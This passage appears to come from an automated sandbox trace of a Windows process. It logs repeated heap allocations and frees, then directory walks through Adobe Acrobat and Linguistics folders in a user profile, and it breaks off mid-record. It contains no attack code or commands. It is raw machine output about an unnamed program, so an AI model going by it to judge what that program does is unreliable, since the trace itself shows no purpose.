HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3262bd0 | out: hHeap=0x660000) returned 1 [0061.380] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xa0) returned 0x3262bd0 [0061.380] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x830) returned 0x9c5d1d0 [0061.380] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5d1d0 | out: hHeap=0x660000) returned 1 [0061.380] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3262bd0 | out: hHeap=0x660000) returned 1 [0061.380] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xa0) returned 0x3262bd0 [0061.380] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x830) returned 0x9c5d1d0 [0061.380] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5d1d0 | out: hHeap=0x660000) returned 1 [0061.380] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3262bd0 | out: hHeap=0x660000) returned 1 [0061.380] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xa0) returned 0x3262bd0 [0061.380] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x830) returned 0x9c5d1d0 [0061.380] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5d1d0 | out: hHeap=0x660000) returned 1 [0061.380] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3262bd0 | out: hHeap=0x660000) returned 1 [0061.380] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xa0) returned 0x3262bd0 [0061.380] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x840) returned 0x9c5d1d0 [0061.380] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5d1d0 | out: hHeap=0x660000) returned 1 [0061.380] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3262bd0 | out: hHeap=0x660000) returned 1 [0061.380] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xa0) returned 0x3262bd0 [0061.380] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x820) returned 0x9c5d1d0 [0061.380] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xc2e) returned 0x9c778e8 [0061.380] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5d1d0 | out: hHeap=0x660000) returned 1 [0061.380] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c778e8 | out: hHeap=0x660000) returned 1 [0061.380] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3262bd0 | out: hHeap=0x660000) returned 1 [0061.380] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xa0) returned 0x3262bd0 [0061.380] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x820) returned 0x9c5d1d0 [0061.380] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5d1d0 | out: hHeap=0x660000) returned 1 [0061.380] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3262bd0 | out: hHeap=0x660000) returned 1 [0061.380] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xa0) returned 0x3262bd0 [0061.381] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x840) returned 0x9c5d1d0 [0061.381] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5d1d0 | out: hHeap=0x660000) returned 1 [0061.381] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3262bd0 | out: hHeap=0x660000) returned 1 [0061.381] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xa0) returned 0x3262bd0 [0061.381] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x860) returned 0x3268798 [0061.381] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3268798 | out: hHeap=0x660000) returned 1 [0061.381] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3262bd0 | out: hHeap=0x660000) returned 1 [0061.381] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xa0) returned 0x3262bd0 [0061.381] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x860) returned 0x3268798 [0061.381] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3268798 | out: hHeap=0x660000) returned 1 [0061.381] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3262bd0 | out: hHeap=0x660000) returned 1 [0061.381] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xa0) returned 0x3262bd0 [0061.381] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x820) returned 0x9c5d1d0 [0061.381] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5d1d0 | out: hHeap=0x660000) returned 1 [0061.381] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3262bd0 | out: hHeap=0x660000) returned 1 [0061.381] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xa0) returned 0x3262bd0 [0061.381] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x820) returned 0x9c5d1d0 [0061.381] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5d1d0 | out: hHeap=0x660000) returned 1 [0061.381] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3262bd0 | out: hHeap=0x660000) returned 1 [0061.381] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xa0) returned 0x3262bd0 [0061.381] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x840) returned 0x9c5d1d0 [0061.381] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5d1d0 | out: hHeap=0x660000) returned 1 [0061.381] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3262bd0 | out: hHeap=0x660000) returned 1 [0061.381] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xa0) returned 0x3262bd0 [0061.381] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x840) returned 0x9c5d1d0 [0061.381] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5d1d0 | out: hHeap=0x660000) returned 1 [0061.381] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3262bd0 | out: hHeap=0x660000) returned 1 [0061.381] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xa0) returned 0x3262bd0 [0061.381] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x830) returned 0x9c5d1d0 [0061.381] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5d1d0 | out: hHeap=0x660000) returned 1 [0061.381] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3262bd0 | out: hHeap=0x660000) returned 1 [0061.381] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xa0) returned 0x3262bd0 [0061.381] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x830) returned 0x9c5d1d0 [0061.381] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5d1d0 | out: hHeap=0x660000) returned 1 [0061.382] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3262bd0 | out: hHeap=0x660000) returned 1 [0061.382] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xa0) returned 0x3262bd0 [0061.382] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x830) returned 0x9c5d1d0 [0061.382] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5d1d0 | out: hHeap=0x660000) returned 1 [0061.382] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3262bd0 | out: hHeap=0x660000) returned 1 [0061.382] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xa0) returned 0x3262bd0 [0061.382] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x820) returned 0x9c5d1d0 [0061.382] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5d1d0 | out: hHeap=0x660000) returned 1 [0061.382] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3262bd0 | out: hHeap=0x660000) returned 1 [0061.382] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xa0) returned 0x3262bd0 [0061.382] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x820) returned 0x9c5d1d0 [0061.382] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5d1d0 | out: hHeap=0x660000) returned 1 [0061.382] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3262bd0 | out: hHeap=0x660000) returned 1 [0061.382] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xa0) returned 0x3262bd0 [0061.382] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x820) returned 0x9c5d1d0 [0061.382] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5d1d0 | out: hHeap=0x660000) returned 1 [0061.382] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3262bd0 | out: hHeap=0x660000) returned 1 [0061.382] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xa0) returned 0x3262bd0 [0061.382] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x830) returned 0x9c5d1d0 [0061.382] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5d1d0 | out: hHeap=0x660000) returned 1 [0061.382] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3262bd0 | out: hHeap=0x660000) returned 1 [0061.382] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xa0) returned 0x3262bd0 [0061.382] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x830) returned 0x9c5d1d0 [0061.382] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xc46) returned 0x9c778e8 [0061.382] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5d1d0 | out: hHeap=0x660000) returned 1 [0061.382] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c778e8 | out: hHeap=0x660000) returned 1 [0061.382] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3262bd0 | out: hHeap=0x660000) returned 1 [0061.382] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xa0) returned 0x3262bd0 [0061.382] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x820) returned 0x9c5d1d0 [0061.382] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5d1d0 | out: hHeap=0x660000) returned 1 [0061.382] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3262bd0 | out: hHeap=0x660000) returned 1 [0061.382] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xa0) returned 0x3262bd0 [0061.382] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x820) returned 0x9c5d1d0 [0061.382] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xc2e) returned 0x9c778e8 [0061.382] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5d1d0 | out: hHeap=0x660000) returned 1 [0061.383] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c778e8 | out: hHeap=0x660000) returned 1 [0061.383] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3262bd0 | out: hHeap=0x660000) returned 1 [0061.383] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xa0) returned 0x3262bd0 [0061.383] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x860) returned 0x3268798 [0061.383] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3268798 | out: hHeap=0x660000) returned 1 [0061.383] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3262bd0 | out: hHeap=0x660000) returned 1 [0061.383] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xa0) returned 0x3262bd0 [0061.383] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x860) returned 0x3268798 [0061.383] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3268798 | out: hHeap=0x660000) returned 1 [0061.383] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3262bd0 | out: hHeap=0x660000) returned 1 [0061.383] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xa0) returned 0x3262bd0 [0061.383] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x820) returned 0x9c5d1d0 [0061.383] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5d1d0 | out: hHeap=0x660000) returned 1 [0061.383] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3262bd0 | out: hHeap=0x660000) returned 1 [0061.383] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xa0) returned 0x3262bd0 [0061.383] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x820) returned 0x9c5d1d0 [0061.383] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5d1d0 | out: hHeap=0x660000) returned 1 [0061.383] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3262bd0 | out: hHeap=0x660000) returned 1 [0061.383] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xa0) returned 0x3262bd0 [0061.383] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x830) returned 0x9c5d1d0 [0061.383] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xc46) returned 0x9c778e8 [0061.383] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5d1d0 | out: hHeap=0x660000) returned 1 [0061.383] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Adobe\\Acrobat\\10.0\\Search\\") returned="Search\\" [0061.383] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x90) returned 0x32ae070 [0061.383] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Adobe\\Acrobat\\10.0\\") returned="10.0\\" [0061.383] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x80) returned 0x6b8588 [0061.383] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Adobe\\Acrobat\\") returned="Acrobat\\" [0061.383] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328e3b0 [0061.383] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Adobe\\") returned="Adobe\\" [0061.384] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\") returned="LocalLow\\" [0061.384] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\") returned="AppData\\" [0061.384] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\") returned="5p5NrGJn0jS HALPmcxz\\" [0061.384] PathFindFileNameW (pszPath="C:\\Users\\") returned="Users\\" [0061.384] PathFindFileNameW (pszPath="C:\\") returned="C:\\" [0061.384] PathFindFileNameW (pszPath="") returned="" [0061.384] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Adobe\\Acrobat\\10.0\\Search\\*", lpFindFileData=0x9f4fba4 | out: lpFindFileData=0x9f4fba4*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xe8287550, ftCreationTime.dwHighDateTime=0x1d2ddf4, ftLastAccessTime.dwLowDateTime=0xe8287550, ftLastAccessTime.dwHighDateTime=0x1d2ddf4, ftLastWriteTime.dwLowDateTime=0xe8287550, ftLastWriteTime.dwHighDateTime=0x1d2ddf4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x68d798 [0061.385] FindNextFileW (in: hFindFile=0x68d798, lpFindFileData=0x9f4fba4 | out: lpFindFileData=0x9f4fba4*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xe8287550, ftCreationTime.dwHighDateTime=0x1d2ddf4, ftLastAccessTime.dwLowDateTime=0xe8287550, ftLastAccessTime.dwHighDateTime=0x1d2ddf4, ftLastWriteTime.dwLowDateTime=0xe8287550, ftLastWriteTime.dwHighDateTime=0x1d2ddf4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0061.385] FindNextFileW (in: hFindFile=0x68d798, lpFindFileData=0x9f4fba4 | out: lpFindFileData=0x9f4fba4*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xe8287550, ftCreationTime.dwHighDateTime=0x1d2ddf4, ftLastAccessTime.dwLowDateTime=0xe8287550, ftLastAccessTime.dwHighDateTime=0x1d2ddf4, ftLastWriteTime.dwLowDateTime=0xe8287550, ftLastWriteTime.dwHighDateTime=0x1d2ddf4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 0 [0061.385] FindClose (in: hFindFile=0x68d798 | out: hFindFile=0x68d798) returned 1 [0061.385] PeekMessageW (in: lpMsg=0x9f4ff08, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x9f4ff08) returned 0 [0061.385] PeekMessageW (in: lpMsg=0x9f4fb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x9f4fb74) returned 0 [0061.385] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Adobe\\Linguistics\\Dictionaries\\Adobe Custom Dictionary\\") returned="Adobe Custom Dictionary\\" [0061.385] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Adobe\\Linguistics\\Dictionaries\\") returned="Dictionaries\\" [0061.385] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Adobe\\Linguistics\\") returned="Linguistics\\" [0061.385] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Adobe\\") returned="Adobe\\" [0061.385] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\") returned="LocalLow\\" [0061.385] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\") returned="AppData\\" [0061.385] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\") returned="5p5NrGJn0jS HALPmcxz\\" [0061.385] PathFindFileNameW (pszPath="C:\\Users\\") returned="Users\\" [0061.385] PathFindFileNameW (pszPath="C:\\") returned="C:\\" [0061.385] PathFindFileNameW (pszPath="") returned="" [0061.386] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Adobe\\Linguistics\\Dictionaries\\Adobe Custom Dictionary\\*", lpFindFileData=0x9f4fba4 | out: lpFindFileData=0x9f4fba4*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xe82613f0, ftCreationTime.dwHighDateTime=0x1d2ddf4, ftLastAccessTime.dwLowDateTime=0xec6bf330, ftLastAccessTime.dwHighDateTime=0x1d2ddf4, ftLastWriteTime.dwLowDateTime=0xec6bf330, ftLastWriteTime.dwHighDateTime=0x1d2ddf4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x68d798 [0061.387] FindNextFileW (in: hFindFile=0x68d798, lpFindFileData=0x9f4fba4 | out: lpFindFileData=0x9f4fba4*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xe82613f0, ftCreationTime.dwHighDateTime=0x1d2ddf4, ftLastAccessTime.dwLowDateTime=0xec6bf330, ftLastAccessTime.dwHighDateTime=0x1d2ddf4, ftLastWriteTime.dwLowDateTime=0xec6bf330, ftLastWriteTime.dwHighDateTime=0x1d2ddf4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0061.387] FindNextFileW (in: hFindFile=0x68d798, lpFindFileData=0x9f4fba4 | out: lpFindFileData=0x9f4fba4*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xe82613f0, ftCreationTime.dwHighDateTime=0x1d2ddf4, ftLastAccessTime.dwLowDateTime=0xe82613f0, ftLastAccessTime.dwHighDateTime=0x1d2ddf4, ftLastWriteTime.dwLowDateTime=0xe82613f0, ftLastWriteTime.dwHighDateTime=0x1d2ddf4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="all", cAlternateFileName="")) returned 1 [0061.387] FindNextFileW (in: hFindFile=0x68d798, lpFindFileData=0x9f4fba4 | out: lpFindFileData=0x9f4fba4*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xeab70f70, ftCreationTime.dwHighDateTime=0x1d2ddf4, ftLastAccessTime.dwLowDateTime=0xeab70f70, ftLastAccessTime.dwHighDateTime=0x1d2ddf4, ftLastWriteTime.dwLowDateTime=0xeab70f70, ftLastWriteTime.dwHighDateTime=0x1d2ddf4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="brt", cAlternateFileName="")) returned 1 [0061.387] FindNextFileW (in: hFindFile=0x68d798, lpFindFileData=0x9f4fba4 | out: lpFindFileData=0x9f4fba4*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xec6bf330, ftCreationTime.dwHighDateTime=0x1d2ddf4, ftLastAccessTime.dwLowDateTime=0xec6bf330, ftLastAccessTime.dwHighDateTime=0x1d2ddf4, ftLastWriteTime.dwLowDateTime=0xec6bf330, ftLastWriteTime.dwHighDateTime=0x1d2ddf4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="brz", cAlternateFileName="")) returned 1 [0061.387] FindNextFileW (in: hFindFile=0x68d798, lpFindFileData=0x9f4fba4 | out: lpFindFileData=0x9f4fba4*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xeb4758f0, ftCreationTime.dwHighDateTime=0x1d2ddf4, ftLastAccessTime.dwLowDateTime=0xeb4758f0, ftLastAccessTime.dwHighDateTime=0x1d2ddf4, ftLastWriteTime.dwLowDateTime=0xeb4758f0, ftLastWriteTime.dwHighDateTime=0x1d2ddf4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="dan", cAlternateFileName="")) returned 1 [0061.388] FindNextFileW (in: hFindFile=0x68d798, lpFindFileData=0x9f4fba4 | out: lpFindFileData=0x9f4fba4*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xebdabf50, ftCreationTime.dwHighDateTime=0x1d2ddf4, ftLastAccessTime.dwLowDateTime=0xebdabf50, ftLastAccessTime.dwHighDateTime=0x1d2ddf4, ftLastWriteTime.dwLowDateTime=0xebdabf50, ftLastWriteTime.dwHighDateTime=0x1d2ddf4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="dut", cAlternateFileName="")) returned 1 [0061.388] FindNextFileW (in: hFindFile=0x68d798, lpFindFileData=0x9f4fba4 | out: lpFindFileData=0x9f4fba4*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xe9487bb0, ftCreationTime.dwHighDateTime=0x1d2ddf4, ftLastAccessTime.dwLowDateTime=0xe9487bb0, ftLastAccessTime.dwHighDateTime=0x1d2ddf4, ftLastWriteTime.dwLowDateTime=0xe9487bb0, ftLastWriteTime.dwHighDateTime=0x1d2ddf4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="eng", cAlternateFileName="")) returned 1 [0061.388] FindNextFileW (in: hFindFile=0x68d798, lpFindFileData=0x9f4fba4 | out: lpFindFileData=0x9f4fba4*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xe9d9af90, ftCreationTime.dwHighDateTime=0x1d2ddf4, ftLastAccessTime.dwLowDateTime=0xe9d9af90, ftLastAccessTime.dwHighDateTime=0x1d2ddf4, ftLastWriteTime.dwLowDateTime=0xe9d9af90, ftLastWriteTime.dwHighDateTime=0x1d2ddf4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="frn", cAlternateFileName="")) returned 1 [0061.388] FindNextFileW (in: hFindFile=0x68d798, lpFindFileData=0x9f4fba4 | out: lpFindFileData=0x9f4fba4*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xe9924650, ftCreationTime.dwHighDateTime=0x1d2ddf4, ftLastAccessTime.dwLowDateTime=0xe9924650, ftLastAccessTime.dwHighDateTime=0x1d2ddf4, ftLastWriteTime.dwLowDateTime=0xe9924650, ftLastWriteTime.dwHighDateTime=0x1d2ddf4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="grm", cAlternateFileName="")) returned 1 [0061.388] FindNextFileW (in: hFindFile=0x68d798, lpFindFileData=0x9f4fba4 | out: lpFindFileData=0x9f4fba4*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xea6d44d0, ftCreationTime.dwHighDateTime=0x1d2ddf4, ftLastAccessTime.dwLowDateTime=0xea6d44d0, ftLastAccessTime.dwHighDateTime=0x1d2ddf4, ftLastWriteTime.dwLowDateTime=0xea6d44d0, ftLastWriteTime.dwHighDateTime=0x1d2ddf4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="itl", cAlternateFileName="")) returned 1 [0061.388] FindNextFileW (in: hFindFile=0x68d798, lpFindFileData=0x9f4fba4 | out: lpFindFileData=0x9f4fba4*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xeb90f4b0, ftCreationTime.dwHighDateTime=0x1d2ddf4, ftLastAccessTime.dwLowDateTime=0xeb90f4b0, ftLastAccessTime.dwHighDateTime=0x1d2ddf4, ftLastWriteTime.dwLowDateTime=0xeb90f4b0, ftLastWriteTime.dwHighDateTime=0x1d2ddf4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="nrw", cAlternateFileName="")) returned 1 [0061.388] FindNextFileW (in: hFindFile=0x68d798, lpFindFileData=0x9f4fba4 | out: lpFindFileData=0x9f4fba4*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xec2489f0, ftCreationTime.dwHighDateTime=0x1d2ddf4, ftLastAccessTime.dwLowDateTime=0xec2489f0, ftLastAccessTime.dwHighDateTime=0x1d2ddf4, ftLastWriteTime.dwLowDateTime=0xec2489f0, ftLastWriteTime.dwHighDateTime=0x1d2ddf4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="prt", cAlternateFileName="")) returned 1 [0061.388] FindNextFileW (in: hFindFile=0x68d798, lpFindFileData=0x9f4fba4 | out: lpFindFileData=0x9f4fba4*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xea237a30, ftCreationTime.dwHighDateTime=0x1d2ddf4, ftLastAccessTime.dwLowDateTime=0xea237a30, ftLastAccessTime.dwHighDateTime=0x1d2ddf4, ftLastWriteTime.dwLowDateTime=0xea237a30, ftLastWriteTime.dwHighDateTime=0x1d2ddf4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="spn", cAlternateFileName="")) returned 1 [0061.388] FindNextFileW (in: hFindFile=0x68d798, lpFindFileData=0x9f4fba4 | out: lpFindFileData=0x9f4fba4*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xeaffa190, ftCreationTime.dwHighDateTime=0x1d2ddf4, ftLastAccessTime.dwLowDateTime=0xeaffa190, ftLastAccessTime.dwHighDateTime=0x1d2ddf4, ftLastWriteTime.dwLowDateTime=0xeaffa190, ftLastWriteTime.dwHighDateTime=0x1d2ddf4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="swd", cAlternateFileName="")) returned 1 [0061.388] FindNextFileW (in: hFindFile=0x68d798, lpFindFileData=0x9f4fba4 | out: lpFindFileData=0x9f4fba4*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xeaffa190, 